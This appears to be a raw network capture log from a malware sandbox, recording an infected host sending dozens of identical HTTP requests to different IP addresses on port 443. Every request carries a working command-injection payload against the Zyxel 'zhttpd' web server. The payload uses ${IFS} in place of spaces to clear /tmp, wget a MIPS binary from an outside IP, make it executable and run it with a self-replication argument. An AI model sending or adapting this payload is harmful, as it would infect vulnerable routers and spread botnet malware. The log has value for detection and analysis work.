                                                Jan 28, 2024 10:16:43.083842039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8979192.168.2.2352778189.99.195.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083869934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8980192.168.2.2335326120.119.234.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083899975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8981192.168.2.2348662151.2.81.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083930969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8982192.168.2.236082250.166.1.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083940983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8983192.168.2.233621642.170.164.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083969116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8984192.168.2.234997835.207.109.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083986998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8985192.168.2.2343786222.168.73.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084023952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8986192.168.2.2340050105.43.141.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084052086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8987192.168.2.233971693.123.43.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084069967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8988192.168.2.2351886181.22.170.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084105015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8989192.168.2.2348820139.100.95.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084129095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8990192.168.2.2358016213.18.130.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084157944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8991192.168.2.2352506139.205.102.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084166050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8992192.168.2.234237077.165.84.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084197044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8993192.168.2.2350214213.187.250.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084222078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8994192.168.2.2351426218.58.180.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084254980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8995192.168.2.23441744.206.123.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084280014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8996192.168.2.2347224223.229.128.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084300995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8997192.168.2.235547294.55.73.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084338903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8998192.168.2.233892040.183.134.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084369898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8999192.168.2.2337816101.181.201.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084383011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9000192.168.2.23346369.192.230.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084444046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9001192.168.2.2348834144.126.50.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084445953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9002192.168.2.234941073.71.148.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084475040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9003192.168.2.2337350108.109.164.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084500074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9004192.168.2.2350730205.109.93.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084507942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9005192.168.2.233352039.60.218.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084512949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9006192.168.2.235952689.167.54.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084558964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9007192.168.2.2335050196.133.27.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084589005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9008192.168.2.2357026208.87.193.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084611893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9009192.168.2.235134460.248.86.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084618092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9010192.168.2.2348708151.110.185.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084635973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9011192.168.2.233357648.206.25.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084656954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9012192.168.2.2357184176.252.27.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084686041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9013192.168.2.234964661.79.212.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084711075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9014192.168.2.2354604185.176.81.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084718943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9015192.168.2.2348564209.174.196.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084779024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9016192.168.2.235674699.232.70.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084803104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9017192.168.2.2340004114.250.47.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084815025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9018192.168.2.2342276177.174.91.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084861040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9019192.168.2.2349270178.187.164.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084887981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9020192.168.2.233888463.158.115.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084925890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9021192.168.2.234453436.81.127.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084925890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9022192.168.2.2341652194.55.131.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084944963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9023192.168.2.234995460.13.106.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.084974051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9024192.168.2.2344524213.134.16.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085005045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9025192.168.2.2360094196.37.115.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085042953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9026192.168.2.2335020110.188.70.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085053921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9027192.168.2.2333540182.145.36.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085078955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9028192.168.2.2356518188.130.211.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085109949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9029192.168.2.2347482107.129.242.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085118055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9030192.168.2.234460634.248.137.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085139990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9031192.168.2.234129850.8.9.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085170031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9032192.168.2.234121237.103.185.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085191011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9033192.168.2.2347296126.201.197.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085212946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9034192.168.2.235674846.211.56.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085239887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9035192.168.2.233311688.64.146.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085263968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9036192.168.2.2344744179.175.104.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085315943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9037192.168.2.2355476101.245.252.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085339069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9038192.168.2.233487818.201.186.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085339069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9039192.168.2.2334428108.154.201.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085359097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9040192.168.2.2334714199.116.98.147443
                                                TimestampBytes transferredDirectionData
